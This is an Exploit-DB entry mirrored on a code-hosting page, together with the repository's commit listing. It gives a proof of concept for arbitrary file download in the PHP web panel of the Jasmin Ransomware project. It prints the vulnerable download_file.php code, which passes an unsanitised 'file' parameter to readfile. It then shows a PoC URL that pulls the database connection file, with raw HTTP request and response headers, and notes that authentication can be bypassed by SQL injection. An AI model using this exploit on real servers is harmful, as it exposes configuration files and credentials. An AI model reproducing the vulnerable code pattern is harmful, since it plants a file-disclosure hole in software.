bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52140.txt
Exploit-DB 2bc15f74f8 DB: 2025-04-09 
9 changes to exploits/shellcodes/ghdb

InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation

Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)

GeoVision GV-ASManager 6.1.0.0  - Information Disclosure

Jasmin Ransomware - Arbitrary File Download (Authenticated)

jQuery 3.3.1 - Prototype Pollution & XSS Exploit

Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)

UNA CMS 14.0.0-RC - PHP Object Injection

WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation
2025-04-09 00:16:23 +00:00

71 lines
No EOL
2.1 KiB
Text
Raw Permalink Blame History

# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
# Google Dork: N/A
# Date: 22-03-2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: N/A
# Tested on: MacOS local xampp
Authentication can be easily bypassed due to SQL Injection as mentioned in:
https://www.exploit-db.com/exploits/52091
Vulnerable file:Web Panel/download_file.php
Vulnerable parameter:file
Vulnerable code:
<?php
session_start();
if(!isset($_SESSION['username']) ){
header("Location: login.php");
}
$file=$_GET['file'];
if(!empty($file)){
// Define headers
header("Cache-Control: public");
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=$file");
header("Content-Type: text/encoded");
header("Content-Transfer-Encoding: binary");
// Read the file
readfile($file);
exit;
}else{
echo 'The file does not exist.';
}
?>
Proof of concept:
http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
GET: HTTP/1.1 200 OK
Date: Sat, 22 Mar 2025 09:42:09 GMT
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
X-Powered-By: PHP/7.4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Description: File Transfer
Content-Disposition: attachment; filename=database/db_conection.php
Content-Transfer-Encoding: binary
Content-Length: 95
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/encoded;charset=UTF-8
Reference in a new issue View git blame Copy permalink